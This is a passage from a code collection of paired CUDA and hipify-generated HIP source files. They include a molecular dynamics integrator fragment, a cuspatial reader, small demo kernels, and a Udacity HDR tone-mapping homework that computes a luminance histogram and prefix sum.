integrateTea_epsilon_unlisted(Coord* d_r){ // Like integrateTea_epsilon, but calculate all-vs-all const int d_i = blockIdx.x * blockDim.x + threadIdx.x; if(d_i < c_par.Ntot * c_par.Ntr){ const int i0 = ((int)(d_i / c_tea.Ntot))*c_tea.Ntot; int i; float4 coord = make_float4(d_r[d_i].x, d_r[d_i].y, d_r[d_i].z, 0.f); float4 sum = make_float4(0.f, 0.f, 0.f, 0.f); for(i = i0; i < i0 + c_tea.Ntot; i++){ if (i != d_i && !c_top.extra[i] && !c_top.extra[d_i]){ sum += integrateTea_epsilon_local(coord, i, d_r); } } c_tea.d_ci[d_i] = make_float4(sum.x, sum.y, sum.z, 0.f); c_tea.d_epsilon[d_i] = sum.w; // Should later be divided by number of non-diagonal degrees-of-freedom in single trajectory } } __device__ inline float4 integrateTea_force(const float4& coord1, const int idx2, const float3& ci, const int idx1){ // Calculate the effective force acting on particle with coordinates `coord1` from particle with index `idx2` // eq. (13,14,19) float4 dr = c_tea.coords[idx2]; dr.x -= coord1.x; dr.y -= coord1.y; dr.z -= coord1.z; dr.w = sqrtf(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z); dr.x /= dr.w; dr.y /= dr.w; dr.z /= dr.w; float4 f = c_tea.mforce[idx2]; float4 r = c_tea.rforce[idx2]; f.x += r.x * ci.x; f.y += r.y * ci.y; f.z += r.z * ci.z; float6 D = integrateTea_RPY(dr); #ifdef PRINT_HI_TENSORS printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+0, D._XX); printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+1, D._XY); printf("d[%d, %d]=%f\n", 3*idx1+0, 3*idx2+2, D._XZ); printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+0, D._YX); printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+1, D._YY); printf("d[%d, %d]=%f\n", 3*idx1+1, 3*idx2+2, D._YZ); printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+0, D._ZX); printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+1, D._ZY); printf("d[%d, %d]=%f\n", 3*idx1+2, 3*idx2+2, D._ZZ); printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+0, D._XX*ci.x); printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+1, D._XY*ci.x); printf("b[%d, %d]=%f\n", 3*idx1+0, 3*idx2+2, D._XZ*ci.x); printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+0, D._YX*ci.y); printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+1, D._YY*ci.y); printf("b[%d, %d]=%f\n", 3*idx1+1, 3*idx2+2, D._YZ*ci.y); printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+0, D._ZX*ci.z); printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+1, D._ZY*ci.z); printf("b[%d, %d]=%f\n", 3*idx1+2, 3*idx2+2, D._ZZ*ci.z); #endif return make_float4( D._XX*f.x + D._XY*f.y + D._XZ*f.z, D._YX*f.x + D._YY*f.y + D._YZ*f.z, D._ZX*f.x + D._ZY*f.y + D._ZZ*f.z, 0.f); } __global__ void integrateTea_kernel_unlisted(Coord* d_f, Coord* d_r){ // Pairist-free version of integrateTea_kernel const int d_i = blockIdx.x*blockDim.x + threadIdx.x; if(d_i < c_par.Ntot * c_par.Ntr ){ int i; float4 coord = c_tea.d_ci[d_i]; // Not coord yet! float4 f = c_tea.mforce[d_i]; float4 df = c_tea.rforce[d_i]; const int tr = d_i / c_tea.Ntot; const float beta_ij = c_tea.d_beta_ij[tr]; float3 ci; // Make ci to be actual C_i coord.w = beta_ij*beta_ij; ci.x = 1.f/sqrtf(1.f + coord.w * coord.x); ci.y = 1.f/sqrtf(1.f + coord.w * coord.y); ci.z = 1.f/sqrtf(1.f + coord.w * coord.z); coord = c_tea.coords[d_i]; // And now it's actually bead coordinates f.x += df.x * ci.x; f.y += df.y * ci.y; f.z += df.z * ci.z; ci.x *= beta_ij; ci.y *= beta_ij; ci.z *= beta_ij; // Calculate effective force const int i0 = ((int)(d_i / c_tea.Ntot))*c_tea.Ntot; for(i = i0; i < i0 + c_tea.Ntot; i++){ if (i == d_i || c_top.extra[d_i] || c_top.extra[i]) continue; df = integrateTea_force(coord, i, ci, d_i); f.x += df.x; f.y += df.y; f.z += df.z; } // Integration step // We've replaced all forces with their `effective` counterparts, so this part of integration process stays the same as in simple langevin integrator const float mult = c_par.dt / c_par.gammaR ; ///c_langevin.hOverZeta; const float3 dr = make_float3(mult*f.x, mult*f.y, mult*f.z); coord.x += dr.x; coord.y += dr.y; coord.z += dr.z; Coord ri = d_r[d_i]; Coord fi = d_f[d_i]; float4 rf_ang = make_float4(0.0, 0.0, 0.0, 0.0); rf_ang = rforce(d_i + c_par.Ntot*c_par.Ntr); if(!c_top.fixed[d_i % c_par.Ntot] && !c_top.extra[d_i]){ ri.x = coord.x; ri.y = coord.y; ri.z = coord.z; ri.fi += (c_par.dt/(c_par.gammaTheta * c_par.alpha))*fi.fi + (c_par.varTheta * sqrt(c_par.freeze_temp / c_par.alpha))*rf_ang.x; ri.psi += (c_par.dt/(c_par.gammaTheta * c_par.alpha))*fi.psi + (c_par.varTheta * sqrt(c_par.freeze_temp / c_par.alpha))*rf_ang.y; ri.theta += (c_par.dt/c_par.gammaTheta)*fi.theta + c_par.varTheta*rf_ang.z; } d_r[d_i] = ri; // Update energies /*coord = c_gsop.d_energies[d_i]; coord.w += c_langevin.tempNorm*(dr.x*dr.x + dr.y*dr.y + dr.z*dr.z); c_gsop.d_energies[d_i] = coord;*/ } } #undef _XX #undef _XY #undef _XZ #undef _YX #undef _YY #undef _YZ #undef _ZX #undef _ZY #undef _ZZ
8cd3f12f9954aee35c9d0590a7abcc60fb4f786d.hip
// !!! This is a file automatically generated by hipify!!! #include <stdio.h> #include <string.h> #include <math.h> #include <hip/hip_runtime.h> #include <utilities/error_utils.hpp> #include <rmm/rmm.h> #include <cudf/types.h> #include <cudf/legacy/column.hpp> #include <cuspatial/soa_readers.hpp> #include <utility/utility.hpp> namespace cuspatial { /** * @brief read timestamp (ts: Time type) data from file as column * see soa_readers.hpp */ gdf_column read_timestamp_soa(const char *filename) { gdf_column ts; memset(&ts,0,sizeof(gdf_column)); struct its_timestamp * timestamp=nullptr; size_t num_t=read_field<its_timestamp>(filename,timestamp); if(timestamp==nullptr) return ts; its_timestamp* temp_ts{nullptr}; RMM_TRY( RMM_ALLOC(&temp_ts, num_t * sizeof(its_timestamp), 0) ); hipStream_t stream{0}; CUDA_TRY( hipMemcpyAsync(temp_ts, timestamp, num_t * sizeof(its_timestamp) , hipMemcpyHostToDevice,stream) ); gdf_column_view_augmented(&ts, temp_ts, nullptr, num_t, GDF_INT64, 0, gdf_dtype_extra_info{TIME_UNIT_NONE}, "timestamp"); delete[] timestamp; return ts; }//read_timestamp_soa }//cuspatial
8cd3f12f9954aee35c9d0590a7abcc60fb4f786d.cu
#include <stdio.h> #include <string.h> #include <math.h> #include <cuda_runtime.h> #include <utilities/error_utils.hpp> #include <rmm/rmm.h> #include <cudf/types.h> #include <cudf/legacy/column.hpp> #include <cuspatial/soa_readers.hpp> #include <utility/utility.hpp> namespace cuspatial { /** * @brief read timestamp (ts: Time type) data from file as column * see soa_readers.hpp */ gdf_column read_timestamp_soa(const char *filename) { gdf_column ts; memset(&ts,0,sizeof(gdf_column)); struct its_timestamp * timestamp=nullptr; size_t num_t=read_field<its_timestamp>(filename,timestamp); if(timestamp==nullptr) return ts; its_timestamp* temp_ts{nullptr}; RMM_TRY( RMM_ALLOC(&temp_ts, num_t * sizeof(its_timestamp), 0) ); cudaStream_t stream{0}; CUDA_TRY( cudaMemcpyAsync(temp_ts, timestamp, num_t * sizeof(its_timestamp) , cudaMemcpyHostToDevice,stream) ); gdf_column_view_augmented(&ts, temp_ts, nullptr, num_t, GDF_INT64, 0, gdf_dtype_extra_info{TIME_UNIT_NONE}, "timestamp"); delete[] timestamp; return ts; }//read_timestamp_soa }//cuspatial
0bc3428b0cdfc68ceddc22868a3db2a3e2ea9a78.hip
// !!! This is a file automatically generated by hipify!!! #include "energy.h" #include <hip/hip_runtime_api.h> #include <hip/hip_runtime.h> #define THREAD_PER_BLOCK 128 __global__ void kernel(int number_of_points, double *d_value) { int i; i = blockDim.x * blockIdx.x + threadIdx.x ; if (i<number_of_points) { double *value = d_value + i * C_NUMBER_OF_VARIABLES; double x = C_A * sin(d_value[phase]); // displacement double v = C_A * C_omega * cos(d_value[phase]); // velocity double U = C_k * x * x / 2.; // potential energy double K = C_m * v * v / 2.; // kinetic energy value[E] += (U + K) / M; // mechanical energy value[phase] += C_omega; // phase progress } } extern "C" void extern_run(const int number_of_points, double *d_value) { int blocks = number_of_points/THREAD_PER_BLOCK +1; // add code to init blocks hipLaunchKernelGGL(( kernel), dim3(blocks), dim3(THREAD_PER_BLOCK), 0, 0, number_of_points, d_value); }
0bc3428b0cdfc68ceddc22868a3db2a3e2ea9a78.cu
#include "energy.h" #include <cuda_runtime_api.h> #include <cuda.h> #define THREAD_PER_BLOCK 128 __global__ void kernel(int number_of_points, double *d_value) { int i; i = blockDim.x * blockIdx.x + threadIdx.x ; if (i<number_of_points) { double *value = d_value + i * C_NUMBER_OF_VARIABLES; double x = C_A * sin(d_value[phase]); // displacement double v = C_A * C_omega * cos(d_value[phase]); // velocity double U = C_k * x * x / 2.; // potential energy double K = C_m * v * v / 2.; // kinetic energy value[E] += (U + K) / M; // mechanical energy value[phase] += C_omega; // phase progress } } extern "C" void extern_run(const int number_of_points, double *d_value) { int blocks = number_of_points/THREAD_PER_BLOCK +1; // add code to init blocks kernel<<<blocks, THREAD_PER_BLOCK>>>(number_of_points, d_value); }
a291a31cc5979c721d42ad58342ec1dcdf192647.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" #include <stdio.h> __global__ void helloGPU(void) { printf(" From thread %d : Sugan Nalla - GPU ! \n ", threadIdx.x); } int main(void) { // From CPU printf(" Sugan Nalla - CPU ! \n "); hipLaunchKernelGGL(( helloGPU) , dim3(1), dim3(10) , 0, 0, ); hipDeviceReset(); return 0; }
a291a31cc5979c721d42ad58342ec1dcdf192647.cu
#include <stdio.h> __global__ void helloGPU(void) { printf(" From thread %d : Sugan Nalla - GPU ! \n ", threadIdx.x); } int main(void) { // From CPU printf(" Sugan Nalla - CPU ! \n "); helloGPU <<< 1, 10 >>>(); cudaDeviceReset(); return 0; }
04e6285b0efeda3b306133439f1ef471d52e3a75.hip
// !!! This is a file automatically generated by hipify!!! #include "hip/hip_runtime.h" /* Udacity Homework 3 HDR Tone-mapping Background HDR ============== A High Dynamic Range (HDR) image contains a wider variation of intensity and color than is allowed by the RGB format with 1 byte per channel that we have used in the previous assignment. To store this extra information we use single precision floating point for each channel. This allows for an extremely wide range of intensity values. In the image for this assignment, the inside of church with light coming in through stained glass windows, the raw input floating point values for the channels range from 0 to 275. But the mean is .41 and 98% of the values are less than 3! This means that certain areas (the windows) are extremely bright compared to everywhere else. If we linearly map this [0-275] range into the [0-255] range that we have been using then most values will be mapped to zero! The only thing we will be able to see are the very brightest areas - the windows - everything else will appear pitch black. The problem is that although we have cameras capable of recording the wide range of intensity that exists in the real world our monitors are not capable of displaying them. Our eyes are also quite capable of observing a much wider range of intensities than our image formats / monitors are capable of displaying. Tone-mapping is a process that transforms the intensities in the image so that the brightest values aren't nearly so far away from the mean. That way when we transform the values into [0-255] we can actually see the entire image. There are many ways to perform this process and it is as much an art as a science - there is no single "right" answer. In this homework we will implement one possible technique. Background Chrominance-Luminance ================================ The RGB space that we have been using to represent images can be thought of as one possible set of axes spanning a three dimensional space of color. We sometimes choose other axes to represent this space because they make certain operations more convenient. Another possible way of representing a color image is to separate the color information (chromaticity) from the brightness information. There are multiple different methods for doing this - a common one during the analog television days was known as Chrominance-Luminance or YUV. We choose to represent the image in this way so that we can remap only the intensity channel and then recombine the new intensity values with the color information to form the final image. Old TV signals used to be transmitted in this way so that black & white televisions could display the luminance channel while color televisions would display all three of the channels. Tone-mapping ============ In this assignment we are going to transform the luminance channel (actually the log of the luminance, but this is unimportant for the parts of the algorithm that you will be implementing) by compressing its range to [0, 1]. To do this we need the cumulative distribution of the luminance values. Example ------- input : [2 4 3 3 1 7 4 5 7 0 9 4 3 2] min / max / range: 0 / 9 / 9 histo with 3 bins: [4 7 3] cdf : [4 11 14] Your task is to calculate this cumulative distribution by following these steps. */ #include <limits.h> #include <float.h> #include <math.h> #include <stdio.h> #include "utils.h" __global__ void histogram_kernel(unsigned int* d_bins, const float* d_in, const int bin_count, const float lum_min, const float lum_max, const int size) { int index = threadIdx.x + blockDim.x * blockIdx.x; if(index >= size) { return; } float lum_range = lum_max - lum_min; int bin = ((d_in[index] - lum_min) / lum_range) * bin_count; atomicAdd(&d_bins[bin], 1); } __global__ void scan_kernel(unsigned int* d_bins, int size) { int index = threadIdx.x + blockDim.x * blockIdx.x; if(index >= size) { return; } for(int i = 1; i <= size; i *= 2) { int spot = index - i; unsigned int val = 0; if(spot >= 0) { val = d_bins[spot]; } __syncthreads(); if(spot >= 0) { d_bins[index] += val; } __syncthreads(); } } // calculate reduce max or min and stick the value in d_answer. __global__ void reduceMinMax_kernel(const float* const d_in, float* d_out, const size_t size, int minmax) { extern __shared__ float shared[]; int index = threadIdx.x + blockDim.x * blockIdx.x; int threadId = threadIdx.x; // we have 1 thread per block, so copying the entire block should work fine if(index < size) { shared[threadId] = d_in[index]; } else { if(minmax == 0) { shared[threadId] = FLT_MAX; } else { shared[threadId] = -FLT_MAX; } } // wait for all threads to copy the memory __syncthreads(); // don't do any thing with memory if we happen to be far off ( I don't know how this works with // sync threads so I moved it after that point ) if(index >= size) { if(threadId == 0) { if(minmax == 0) { d_out[blockIdx.x] = FLT_MAX; } else { d_out[blockIdx.x] = -FLT_MAX; } } return; } for(unsigned int i = blockDim.x/2; i > 0; i /= 2) { if(threadId < i) { if(minmax == 0) { shared[threadId] = min(shared[threadId], shared[threadId + i]); } else { shared[threadId] = max(shared[threadId], shared[threadId + i]); } } __syncthreads(); } if(threadId == 0) { d_out[blockIdx.x] = shared[0]; } } int get_max_size(int n, int d) { return (int)ceil( (float)n/(float)d ) + 1; } float reduceMinMax(const float* const d_in, const size_t size, int minMax) { int BLOCK_SIZE = 32; // we need to keep reducing until we get to the amount that we consider // having the entire thing fit into one block size size_t curr_size = size; float* d_curr_in; checkCudaErrors(hipMalloc(&d_curr_in, sizeof(float) * size)); checkCudaErrors(hipMemcpy(d_curr_in, d_in, sizeof(float) * size, hipMemcpyDeviceToDevice)); float* d_curr_out; dim3 thread_dim(BLOCK_SIZE); const int shared_mem_size = sizeof(float)*BLOCK_SIZE; while(true) { checkCudaErrors(hipMalloc(&d_curr_out, sizeof(float) * get_max_size(curr_size, BLOCK_SIZE))); dim3 block_dim(get_max_size(size, BLOCK_SIZE)); hipLaunchKernelGGL(( reduceMinMax_kernel), dim3(block_dim), dim3(thread_dim), shared_mem_size, 0, d_curr_in, d_curr_out, curr_size, minMax); hipDeviceSynchronize(); checkCudaErrors(hipGetLastError()); // move the current input to the output, and clear the last input if necessary checkCudaErrors(hipFree(d_curr_in)); d_curr_in = d_curr_out; if(curr_size < BLOCK_SIZE) break; curr_size = get_max_size(curr_size, BLOCK_SIZE); } // theoretically we should be float h_out; hipMemcpy(&h_out, d_curr_out, sizeof(float), hipMemcpyDeviceToHost); hipFree(d_curr_out); return h_out; } void your_histogram_and_prefixsum(const float* const d_logLuminance, unsigned int* const d_cdf, float &min_logLum, float &max_logLum, const size_t numRows, const size_t numCols, const size_t numBins) { const size_t size = numRows*numCols; min_logLum = reduceMinMax(d_logLuminance, size, 0); max_logLum = reduceMinMax(d_logLuminance, size, 1); printf("Got min value: %f\n", min_logLum); printf("Got max value: %f\n", max_logLum); printf("Number of Bins: %d\n\n", numBins); unsigned int* d_bins; size_t histo_size = sizeof(unsigned int)*numBins; //determine the size of the bins checkCudaErrors(hipMalloc(&d_bins, histo_size)); checkCudaErrors(hipMemset(d_bins, 0, histo_size)); //set up the thread dimensions dim3 thread_dim(1024); dim3 hist_block_dim(get_max_size(size, thread_dim.x)); // deploy the kernel and calculate the image hipLaunchKernelGGL(( histogram_kernel), dim3(hist_block_dim), dim3(thread_dim), 0, 0, d_bins, d_logLuminance, numBins, min_logLum, max_logLum, size); hipDeviceSynchronize(); checkCudaErrors(hipGetLastError()); // get the output from the device unsigned int h_out[100]; hipMemcpy(&h_out, d_bins, sizeof(unsigned int) * 100, hipMemcpyDeviceToHost); // set up the can block dim3 scan_block_dim(get_max_size(numBins, thread_dim.x)); // release the kernels hipLaunchKernelGGL(( scan_kernel), dim3(scan_block_dim), dim3(thread_dim), 0, 0, d_bins, numBins); hipDeviceSynchronize(); checkCudaErrors(hipGetLastError()); // copy the data back over hipMemcpy(&h_out, d_bins, sizeof(unsigned int)*100, hipMemcpyDeviceToHost); hipMemcpy(d_cdf, d_bins, histo_size, hipMemcpyDeviceToDevice); checkCudaErrors(hipFree(d_bins)); //TODO /*Here are the steps you need to implement X - 1) find the minimum and maximum value in the input logLuminance channel store in min_logLum and max_logLum X - 2) subtract them to find the range X - 3) generate a histogram of all the values in the logLuminance channel using the formula: bin = (lum[i] - lumMin) / lumRange * numBins X - 4) Perform an exclusive scan (prefix sum) on the histogram to get the cumulative distribution of luminance values (this should go in the incoming d_cdf pointer which already has been allocated for you) */ }
04e6285b0efeda3b306133439f1ef471d52e3a75.cu
/* Udacity Homework 3 HDR Tone-mapping Background HDR ============== A High Dynamic Range (HDR) image contains a wider variation of intensity and color than is allowed by the RGB format with 1 byte per channel that we have used in the previous assignment. To store this extra information we use single precision floating point for each channel. This allows for an extremely wide range of intensity values. In the image for this assignment, the inside of church with light coming in through stained glass windows, the raw input floating point values for the channels range from 0 to 275. But the mean is .41 and 98% of the values are less than 3! This means that certain areas (the windows) are extremely bright compared to everywhere else. If we linearly map this [0-275] range into the [0-255] range that we have been using then most values will be mapped to zero! The only thing we will be able to see are the very brightest areas - the windows - everything else will appear pitch black. The problem is that although we have cameras capable of recording the wide range of intensity that exists in the real world our monitors are not capable of displaying them. Our eyes are also quite capable of observing a much wider range of intensities than our image formats / monitors are capable of displaying. Tone-mapping is a process that transforms the intensities in the image so that the brightest values aren't nearly so far away from the mean. That way when we transform the values into [0-255] we can actually see the entire image. There are many ways to perform this process and it is as much an art as a science - there is no single "right" answer. In this homework we will implement one possible technique. Background Chrominance-Luminance ================================ The RGB space that we have been using to represent images can be thought of as one possible set of axes spanning a three dimensional space of color. We sometimes choose other axes to represent this space because they make certain operations more convenient. Another possible way of representing a color image is to separate the color information (chromaticity) from the brightness information. There are multiple different methods for doing this - a common one during the analog television days was known as Chrominance-Luminance or YUV. We choose to represent the image in this way so that we can remap only the intensity channel and then recombine the new intensity values with the color information to form the final image. Old TV signals used to be transmitted in this way so that black & white televisions could display the luminance channel while color televisions would display all three of the channels. Tone-mapping ============ In this assignment we are going to transform the luminance channel (actually the log of the luminance, but this is unimportant for the parts of the algorithm that you will be implementing) by compressing its range to [0, 1]. To do this we need the cumulative distribution of the luminance values. Example ------- input : [2 4 3 3 1 7 4 5 7 0 9 4 3 2] min / max / range: 0 / 9 / 9 histo with 3 bins: [4 7 3] cdf : [4 11 14] Your task is to calculate this cumulative distribution by following these steps. */ #include <limits.h> #include <float.h> #include <math.h> #include <stdio.h> #include "utils.h" __global__ void histogram_kernel(unsigned int* d_bins, const float* d_in, const int bin_count, const float lum_min, const float lum_max, const int size) { int index = threadIdx.x + blockDim.x * blockIdx.x; if(index >= size) { return; } float lum_range = lum_max - lum_min; int bin = ((d_in[index] - lum_min) / lum_range) * bin_count; atomicAdd(&d_bins[bin], 1); } __global__ void scan_kernel(unsigned int* d_bins, int size) { int index = threadIdx.x + blockDim.x * blockIdx.x; if(index >= size) { return; } for(int i = 1; i <= size; i *= 2) { int spot = index - i; unsigned int val = 0; if(spot >= 0) { val = d_bins[spot]; } __syncthreads(); if(spot >= 0) { d_bins[index] += val; } __syncthreads(); } } // calculate reduce max or min and stick the value in d_answer. __global__ void reduceMinMax_kernel(const float* const d_in, float* d_out, const size_t size, int minmax) { extern __shared__ float shared[]; int index = threadIdx.x + blockDim.x * blockIdx.x; int threadId = threadIdx.x; // we have 1 thread per block, so copying the entire block should work fine if(index < size) { shared[threadId] = d_in[index]; } else { if(minmax == 0) { shared[threadId] = FLT_MAX; } else { shared[threadId] = -FLT_MAX; } } // wait for all threads to copy the memory __syncthreads(); // don't do any thing with memory if we happen to be far off ( I don't know how this works with // sync threads so I moved it after that point ) if(index >= size) { if(threadId == 0) { if(minmax == 0) { d_out[blockIdx.x] = FLT_MAX; } else { d_out[blockIdx.x] = -FLT_MAX; } } return; } for(unsigned int i = blockDim.x/2; i > 0; i /= 2) { if(threadId < i) { if(minmax == 0) { shared[threadId] = min(shared[threadId], shared[threadId + i]); } else { shared[threadId] = max(shared[threadId], shared[threadId + i]); } } __syncthreads(); } if(threadId == 0) { d_out[blockIdx.x] = shared[0]; } } int get_max_size(int n, int d) { return (int)ceil( (float)n/(float)d ) + 1; } float reduceMinMax(const float* const d_in, const size_t size, int minMax) { int BLOCK_SIZE = 32; // we need to keep reducing until we get to the amount that we consider // having the entire thing fit into one block size size_t curr_size = size; float* d_curr_in; checkCudaErrors(cudaMalloc(&d_curr_in, sizeof(float) * size)); checkCudaErrors(cudaMemcpy(d_curr_in, d_in, sizeof(float) * size, cudaMemcpyDeviceToDevice)); float* d_curr_out; dim3 thread_dim(BLOCK_SIZE); const int shared_mem_size = sizeof(float)*BLOCK_SIZE; while(true) { checkCudaErrors(cudaMalloc(&d_curr_out, sizeof(float) * get_max_size(curr_size, BLOCK_SIZE))); dim3 block_dim(get_max_size(size, BLOCK_SIZE)); reduceMinMax_kernel<<<block_dim, thread_dim, shared_mem_size>>> (d_curr_in, d_curr_out, curr_size, minMax); cudaDeviceSynchronize(); checkCudaErrors(cudaGetLastError()); // move the current input to the output, and clear the last input if necessary checkCudaErrors(cudaFree(d_curr_in)); d_curr_in = d_curr_out; if(curr_size < BLOCK_SIZE) break; curr_size = get_max_size(curr_size, BLOCK_SIZE); } // theoretically we should be float h_out; cudaMemcpy(&h_out, d_curr_out, sizeof(float), cudaMemcpyDeviceToHost); cudaFree(d_curr_out); return h_out; } void your_histogram_and_prefixsum(const float* const d_logLuminance, unsigned int* const d_cdf, float &min_logLum, float &max_logLum, const size_t numRows, const size_t numCols, const size_t numBins) { const size_t size = numRows*numCols; min_logLum = reduceMinMax(d_logLuminance, size, 0); max_logLum = reduceMinMax(d_logLuminance, size, 1); printf("Got min value: %f\n", min_logLum); printf("Got max value: %f\n", max_logLum); printf("Number of Bins: %d\n\n", numBins); unsigned int* d_bins; size_t histo_size = sizeof(unsigned int)*numBins; //determine the size of the bins checkCudaErrors(cudaMalloc(&d_bins, histo_size)); checkCudaErrors(cudaMemset(d_bins, 0, histo_size)); //set up the thread dimensions dim3 thread_dim(1024); dim3 hist_block_dim(get_max_size(size, thread_dim.x)); // deploy the kernel and calculate the image histogram_kernel<<<hist_block_dim, thread_dim>>> (d_bins, d_logLuminance, numBins, min_logLum, max_logLum, size); cudaDeviceSynchronize(); checkCudaErrors(cudaGetLastError()); // get the output from the device unsigned int h_out[100]; cudaMemcpy(&h_out, d_bins, sizeof(unsigned int) * 100, cudaMemcpyDeviceToHost); // set up the can block dim3 scan_block_dim(get_max_size(numBins, thread_dim.x)); // release the kernels scan_kernel<<<scan_block_dim, thread_dim>>>(d_bins, numBins); cudaDeviceSynchronize(); checkCudaErrors(cudaGetLastError()); // copy the data back over cudaMemcpy(&h_out, d_bins, sizeof(unsigned int)*100, cudaMemcpyDeviceToHost); cudaMemcpy(d_cdf, d_bins, histo_size, cudaMemcpyDeviceToDevice); checkCudaErrors(cudaFree(d_bins)); //TODO /*Here are the steps you need to implement X - 1) find the minimum and maximum value in the input logLuminance channel store in min_logLum and max_logLum X - 2) subtract them to find the range X - 3) generate a histogram of all the values in the logLuminance channel using the formula: bin = (lum[i] - lumMin) / lumRange * numBins X - 4) Perform an exclusive scan (prefix sum) on the histogram to get the cumulative distribution of luminance values (this should go in the incoming d_cdf pointer which already has been allocated for you) */ }
6aefcef3d3619bd2478d43bf5915129d37a0ec1d.hip
// !!! This is a file automatically generated by hipify!!! #include <hip/hip_runtime.h> #include "device_launch_parameters.h" #include <iostream> #include <stdio.h> #include <chrono> #include "ParticleRenderer.hpp" #include "ParticleSystem.hpp" #include "math.cuh" int main(int argc, char** argv) { srand(time(NULL)); ParticleRenderer ren; glutInit(&argc, argv); ren.initGL(); ren.initSystem(); ren.begin(); /* //defining program attributes int N = 1000; size_t size = N * sizeof(float); //int TPB = 1024; //threads per block int times = 1; //allocating host memory float *res = (float *)malloc(size); float *in1 = (float *)malloc(size); float *in2 = (float *)malloc(size); //defining pointers to device memory float *d_res = NULL; float *d_in1 = NULL; float *d_in2 = NULL; //initializing values for (int i = 0; i < N; i++) { in1[i] = rand() / (float)RAND_MAX; in2[i] = rand() / (float)RAND_MAX; } auto t1 = Clock::now(); hipMalloc((void**)&d_res, size); hipMalloc((void**)&d_in1, size); hipMalloc((void**)&d_in2, size); //copying to device memory hipError_t err = hipMemcpy(d_res, res, size, hipMemcpyHostToDevice); err = hipMemcpy(d_in1, in1, size, hipMemcpyHostToDevice); err = hipMemcpy(d_in2, in2, size, hipMemcpyHostToDevice); //call function to execute on device int numblocks = (N + TPB - 1) / TPB; for (int i = 0; i < times; i++) { ARR_ADDC << <numblocks, TPB >> >(d_res, d_in1, d_in2, N); } err = hipGetLastError(); if (err != hipSuccess) { fprintf(stderr, "Failed to launch vectorAdd kernel (error code %s)!\n", hipGetErrorString(err)); exit(EXIT_FAILURE); } //copy result back to host err = hipMemcpy(res, d_res, size, hipMemcpyDeviceToHost); //free memory on device hipFree(d_res); hipFree(d_in1); hipFree(d_in2); auto t2 = Clock::now(); std::cout << "Delta t2-t1: " << std::chrono::duration_cast<std::chrono::nanoseconds>(t2 - t1).count() << " nanoseconds" << std::endl; //print result to window double checksum = 0; for (int i = 0; i < N; i++) { checksum += res[i]; } std::cout << "Parrelelized N=" << N << " : " << checksum << std::endl; float *in1N = in2; float *in2N = in1; //free host memory free(res); auto t1N = Clock::now(); float *resN = (float*)malloc(size); for (int ii = 0; ii < times; ii++) { for (int i = 0; i < N; i++) { resN[i] = in1N[i] + in2N[i]; } } auto t2N = Clock::now(); std::cout << "Delta t2-t1: " << std::chrono::duration_cast<std::chrono::nanoseconds>(t2N - t1N).count() << " nanoseconds" << std::endl; checksum = 0; for (int i = 0; i < N; i++) { checksum += resN[i]; } std::cout << "Standard N=" << N << " : " << checksum << std::endl; free(in1); free(in2); */ }
6aefcef3d3619bd2478d43bf5915129d37a0ec1d.cu
#include <cuda_runtime.h> #include "device_launch_parameters.h" #include <iostream> #include <stdio.h> #include <chrono> #include "ParticleRenderer.hpp" #include "ParticleSystem.hpp" #include "math.cuh" int main(int argc, char** argv) { srand(time(NULL)); ParticleRenderer ren; glutInit(&argc, argv); ren.initGL(); ren.initSystem(); ren.begin(); /* //defining program attributes int N = 1000; size_t size = N * sizeof(float); //int TPB = 1024; //threads per block int times = 1; //allocating host memory float *res = (float *)malloc(size); float *in1 = (float *)malloc(size); float *in2 = (float *)malloc(size); //defining pointers to device memory float *d_res = NULL; float *d_in1 = NULL; float *d_in2 = NULL; //initializing values for (int i = 0; i < N; i++) { in1[i] = rand() / (float)RAND_MAX; in2[i] = rand() / (float)RAND_MAX; } auto t1 = Clock::now(); cudaMalloc((void**)&d_res, size); cudaMalloc((void**)&d_in1, size); cudaMalloc((void**)&d_in2, size); //copying to device memory cudaError_t err = cudaMemcpy(d_res, res, size, cudaMemcpyHostToDevice); err = cudaMemcpy(d_in1, in1, size, cudaMemcpyHostToDevice); err = cudaMemcpy(d_in2, in2, size, cudaMemcpyHostToDevice); //call function to execute on device int numblocks = (N + TPB - 1) / TPB; for (int i = 0; i < times; i++) { ARR_ADDC << <numblocks, TPB >> >(d_res, d_in1, d_in2, N); } err = cudaGetLastError(); if (err != cudaSuccess) { fprintf(stderr, "Failed to launch vectorAdd kernel (error code %s)!\n", cudaGetErrorString(err)); exit(EXIT_FAILURE); } //copy result back to host err = cudaMemcpy(res, d_res, size, cudaMemcpyDeviceToHost); //free memory on device cudaFree(d_res); cudaFree(d_in1); cudaFree(d_in2); auto t2 = Clock::now(); std::cout << "Delta t2-t1: " << std::chrono::duration_cast<std::chrono::nanoseconds>(t2 - t1).count() << " nanoseconds" << std::endl; //print result to window double checksum = 0; for (int i = 0; i < N; i++) { checksum += res[i]; } std::cout << "Parrelelized N=" << N << " : " << checksum << std::endl; float *in1N = in2; float *in2N = in1; //free host memory free(res); auto t1N = Clock::now(); float *resN = (float*)malloc(size); for (int ii = 0; ii < times; ii++) { for (int i = 0; i < N; i++) { resN[i] = in1N[i] + in2N[i]; } } auto t2N = Clock::now(); std::cout << "Delta t2-t1: " << std::chrono::duration_cast<std::chrono::nanoseconds>(t2N - t1N).count() << " nanoseconds" << std::endl; checksum = 0; for (int i = 0; i < N; i++) { checksum += resN[i]; } std::cout << "Standard N=" << N << " : " << checksum << std::endl; free(in1); free(in2); */ }
8007db367ed863cdff8e196528d057655d20c7bf.hip
